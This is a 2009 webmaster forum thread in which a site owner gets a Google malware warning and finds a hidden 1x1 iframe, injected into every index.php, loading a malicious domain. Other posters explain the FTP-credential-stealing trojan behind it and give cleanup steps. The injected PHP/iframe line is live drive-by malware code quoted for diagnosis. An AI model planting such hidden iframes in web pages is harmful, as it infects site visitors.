Webmaster Forum

Go Back   Webmaster Forum > Marketing Forums > Google Forum

Google Forum Discuss Google related issues.


Reply
 
Thread Tools Display Modes
Share |
  #1  
Old 07-05-2009, 06:49 PM
severus severus is offline
Junior Member
 
Join Date: 06-04-09
Posts: 18
iTrader: 0 / 0%
Google warning "This site may harm your computer."

Hi all,

Two days ago, Google show this warning on my site: "This site may harm your computer" but I really don't distribute any malware, virus or any thing like that. This thing decrease my traffic seriously.

Here is information from Google Safe Browsing:

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-07-03, and the last time suspicious content was found on this site was on 2009-07-03.
Malicious software is hosted on 1 domain(s), including maislex.net/.
This site was hosted on 1 network(s) including AS26496 (PAH).


My site was hosted in GoDaddy hosting.

How can I solve this problem?

Thanks in advance.
 
Reply With Quote

Advertisement

Advertisement

  #2  
Old 07-05-2009, 07:07 PM
livePR.ezer.com's Avatar
livePR.ezer.com livePR.ezer.com is offline
Contributing Member
 
Join Date: 10-14-06
Location: LivePR.ezer.com
Posts: 875
iTrader: 0 / 0%
It happens to many sites.

It was good you found the message by yourself.

way 1. Research again.
way 2. My friend Tony told me to click the link and link to your site with a browser has Google tool bar.

The message shall disappear.


Regards,
 
Reply With Quote
  #3  
Old 07-05-2009, 07:29 PM
severus severus is offline
Junior Member
 
Join Date: 06-04-09
Posts: 18
iTrader: 0 / 0%
Thanks for your quick reply.

I did as your instruction but this problem still occurs.

Currently, I didn't use any anti virus in my laptop so I think my hosting can be infected virus from my laptop. Should I install new anti virus program and scan all files in my hard drives, an re-upload my source code files into my host? Can it solve the problem?
 
Reply With Quote
  #4  
Old 07-05-2009, 07:43 PM
livePR.ezer.com's Avatar
livePR.ezer.com livePR.ezer.com is offline
Contributing Member
 
Join Date: 10-14-06
Location: LivePR.ezer.com
Posts: 875
iTrader: 0 / 0%
Yahoo tool bar has an anti-spy you may try it.
 
Reply With Quote
  #5  
Old 07-05-2009, 08:01 PM
~kev~'s Avatar
~kev~ ~kev~ is offline
v7n Mentor
 
Join Date: 02-06-08
Location: Texas
Posts: 1,544
iTrader: 0 / 0%
Quote:
Originally Posted by severus View Post
Hi all,

How can I solve this problem?

Thanks in advance.
Stop serving up malware and drive by infects - that is how you fix the problem. Google does not issues those warnings just for the "fun of it". There is a problem with your site and you need to fix it.
 
Reply With Quote
  #6  
Old 07-05-2009, 09:08 PM
severus severus is offline
Junior Member
 
Join Date: 06-04-09
Posts: 18
iTrader: 0 / 0%
I have checked all my source code files in GoDaddy hosting. All index.php files of all my sites had been added one more line of code as below:

<?php
echo "<iframe src=\"http://maislex.net/?click=63B3ED\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>

But my source code files in my laptop don't have this code. I think GoDaddy hosting has been infected virus. It's really unbelievable.

I have deleted this line of code and re-upload to hosting, but I am not sure this problem can't occur again

Is there any solution to solve it absolutely?
 
Reply With Quote
  #7  
Old 07-05-2009, 09:18 PM
livePR.ezer.com's Avatar
livePR.ezer.com livePR.ezer.com is offline
Contributing Member
 
Join Date: 10-14-06
Location: LivePR.ezer.com
Posts: 875
iTrader: 0 / 0%
Did your site install a forum or blogger script ?
 
Reply With Quote
  #8  
Old 07-05-2009, 09:24 PM
severus severus is offline
Junior Member
 
Join Date: 06-04-09
Posts: 18
iTrader: 0 / 0%
Quote:
Originally Posted by livePR.ezer.com View Post
Did your site install a forum or blogger script ?
No, I don't use forum or blogger script at all. I developed by myself. I have use Google Web Master tool to request Google review my sites. Hope it better.
 
Reply With Quote
  #9  
Old 07-05-2009, 09:38 PM
livePR.ezer.com's Avatar
livePR.ezer.com livePR.ezer.com is offline
Contributing Member
 
Join Date: 10-14-06
Location: LivePR.ezer.com
Posts: 875
iTrader: 0 / 0%
hi

google has some info here

google.com/safebrowsing/diagnostic?site=maislex.net/

BTW
you may use the tool check your site
google.com/safebrowsing/diagnostic?site= your site

Last edited by livePR.ezer.com; 07-05-2009 at 09:43 PM.
 
Reply With Quote
  #10  
Old 07-06-2009, 04:59 AM
WeWatch WeWatch is offline
Junior Member
 
Join Date: 07-06-09
Posts: 11
iTrader: 0 / 0%
The maislex.net type of website infection is an off-shoot of the martuz/gumblar infections. It's usually the result of a virus/trojan on one of the PCs used to update the website.

What it does is scans your PC looking for any stored username and passwords. If it finds them in FTP software, it sends them and the IP of the website(s) to a server. That server then connects to the website, with the stolen FTP credentials, injects it's infectious code and then starts checking it to see if you've removed their code. If you have, then it tries to re-inject it.

Steps you should take:

1. Scan all PCs with a new anti-virus program. Whatever you're using now isn't good enough because this virus already knows how to hide from it. If you're using AVG, try Avast or Avira. If you're using McAfee, use AVG. You need to use a different AV program than what you were using when you became infected.

2. After scanning and cleaning all PCs that connect via FTP to your website, change the FTP password to your site. Change all of them if you have more than one username.

3. Download your site, scan every file for malicious code. Anything that you didn't put there should be removed because the cybercriminals are very good at obfuscating their malware. If you need help finding all the malicious scripts in your site, post the name of your site here and we'll help you.

4. Re-upload your site.

5. Login to Google webmasters tools and request a review of your site. If it's clean, Google will then remove that warning. You may have to verify your site with Google before you can request a review. Follow their steps and you'll be fine.

Post back here with your results or questions so that others may learn from your experience.
 
Reply With Quote
  #11  
Old 07-06-2009, 06:45 AM
~kev~'s Avatar
~kev~ ~kev~ is offline
v7n Mentor
 
Join Date: 02-06-08
Location: Texas
Posts: 1,544
iTrader: 0 / 0%
Quote:
Originally Posted by severus View Post
But my source code files in my laptop don't have this code. I think GoDaddy hosting has been infected virus. It's really unbelievable.
Chances are you have a key logger installed on your laptop. The hacker was able to record your key strokes and then was able to access your server and make the changes to your pages.

Notify godaddy and ask them to do a security audit of the server.

And you do a security audit of your laptop. If you are not sure on how to audit your own system, you may want to contact a computer tech in your area and have them do it for you.
 
Reply With Quote
  #12  
Old 07-06-2009, 06:57 AM
WeWatch WeWatch is offline
Junior Member
 
Join Date: 07-06-09
Posts: 11
iTrader: 0 / 0%
GoDaddy will tell him that it's not their problem.

If the OP has a virus or trojan on their laptop, and that virus/trojan steals their username and password and then logs in as them, injects infectious code into their site, it's not GoDaddy's issue. The responsibility lies with the website owner.

This virus works in 2 ways:

First, it scans all the files of the local PC looking for which FTP software is used. It knows where to look for such popular programs as: Dreamweaver, FrontPage, FileZilla, WS_FTP and many others. Then it checks the files where usernames and passwords are stored so the user doesn't have to enter them each time they want to FTP to the site. It steals those, sends them to a server which them modifies the code on the site.

Second way it works is, it "sniffs" the outgoing FTP traffic. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus/trojan to see the username and password being transmitted, records it and sends it to a server which then injects it's malscripts into the website in various places.

Sorry to seem argumentative, but it's not technically a keyboard logger - yet. Maybe next month's version of this virus will be as we've been telling people to move away from FTP and use either SFTP or FTPS both of which encrypt all their data transmitted.
 
Reply With Quote
  #13  
Old 07-06-2009, 12:18 PM
~kev~'s Avatar
~kev~ ~kev~ is offline
v7n Mentor
 
Join Date: 02-06-08
Location: Texas
Posts: 1,544
iTrader: 0 / 0%
Quote:
Originally Posted by WeWatch View Post
GoDaddy will tell him that it's not their problem.

If the OP has a virus or trojan on their laptop, and that virus/trojan steals their username and password and then logs in as them, injects infectious code into their site, it's not GoDaddy's issue. The responsibility lies with the website owner.
We have no real evidence to prove that his laptop is infected with anything. All we are doing is speculating as to what "might" be the problem.

And I disagree about godaddys repsonsibility. The hosting provider should audit the server to make sure no other breaches have been done.

We do not know if the server OS is up to date, is apache up to date, is mysql up to date, is php up to date,,,,,? As far as I know, godaddy is using a version of red hat that is 10 years old and can be hacked by a 10 year old kid. Or is this a windows 2000 server that has not been updated in 9 years?

There are too many factors to point the finger with no real evidence.
 
Reply With Quote
  #14  
Old 07-07-2009, 03:17 AM
mit's Avatar
mit mit is offline
SEO Guru
 
Join Date: 07-18-06
Location: India
Posts: 2,796
iTrader: 0 / 0%
Actually, if you have this kind of problem, just must need to have an account on Google webmaster tools. From there, you can get the basic problem / problematic URL and then you can find and fix the problem.
 
Reply With Quote
  #15  
Old 07-07-2009, 04:44 AM
tcyonline.com tcyonline.com is offline
Banned
 
Join Date: 04-08-09
Location: India
Posts: 185
iTrader: 0 / 0%
Hi,
I have also faced same type of problems with my previous websites where I was working. I have taken all source code back up and scan it with an anti virus and hosted it to the same server....after that my problems have been solved and also message was not there.
 
Reply With Quote
  #16  
Old 07-08-2009, 12:36 AM
bermuda's Avatar
bermuda bermuda is offline
Contributing Member
 
Join Date: 08-12-06
Posts: 1,132
iTrader: 0 / 0%
The recent problem has been noticed on thousands of computers worldwide and it is a Trojan attacking computers and then it will affect the FTP applications.

When you upload the Index files, an Iframe will be added to that. Scan your computer with as many programs as you can and then reupload the pages.
 
Reply With Quote
  #17  
Old 07-08-2009, 12:52 AM
livePR.ezer.com's Avatar
livePR.ezer.com livePR.ezer.com is offline
Contributing Member
 
Join Date: 10-14-06
Location: LivePR.ezer.com
Posts: 875
iTrader: 0 / 0%
I do think Safe Browsing is an important issue.

So based on Google safe browsing diagnostic I just made and wanted to share the safe site checker.


 
Reply With Quote
  #18  
Old 07-15-2009, 03:04 AM
Sheikh Ahsan Sheikh Ahsan is offline
Contributing Member
 
Join Date: 07-13-09
Posts: 100
iTrader: 0 / 0%
I am also facing this problem, i need to download a forum for attestation and when i search from google it says harmful site... and i cant open its!! tried many tricks but still i m unable to surf it! Need help!!
 
Reply With Quote
  #19  
Old 07-15-2009, 04:08 AM
umesh umesh is offline
Banned
 
Join Date: 07-07-09
Location: Dhanbad
Posts: 105
iTrader: 0 / 0%
Quote:
Originally Posted by Sheikh Ahsan View Post
I am also facing this problem, i need to download a forum for attestation and when i search from google it says harmful site... and i cant open its!! tried many tricks but still i m unable to surf it! Need help!!
Hi,
This is trojan virus better to take your back up your uploaded files and scan your files with updated anti virus and reupload all the file. Your problem will be fixed.
 
Reply With Quote
  #20  
Old 07-16-2009, 08:10 AM
Sheikh Ahsan Sheikh Ahsan is offline
Contributing Member
 
Join Date: 07-13-09
Posts: 100
iTrader: 0 / 0%
Umesh yes it was the trojan virus........... infact it infected my whole computer i m reintalling the windows!! but thanks for helppppp maan!!
cheers!
 
Reply With Quote
Go Back   Webmaster Forum > Marketing Forums > Google Forum

Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
"This Site May Harm Your Computer!" Appreciate Some Assistance. Joaquin Maldonado SEO Forum 5 02-28-2009 08:30 AM
<input type="image" src="login_button.png" name="login" /> Error in IE !! HELP 2939195631902 Coding Forum 9 02-20-2009 09:43 AM
Which Famous PR site are without " rel="nofollow" "? searchmaster SEO Forum 13 10-03-2007 09:16 AM
Home page with "latest news", "news archive" and "update" tekitouni Web Design Lobby 1 09-19-2006 07:39 PM


V7N Network
Get exposure! V7N I Love Photography V7N SEO Blog V7N Directory


All times are GMT -7. The time now is 08:10 PM.
Powered by vBulletin
Copyright 2000-2014 Jelsoft Enterprises Limited.
Copyright © 2003 - 2018 VIX-WomensForum LLC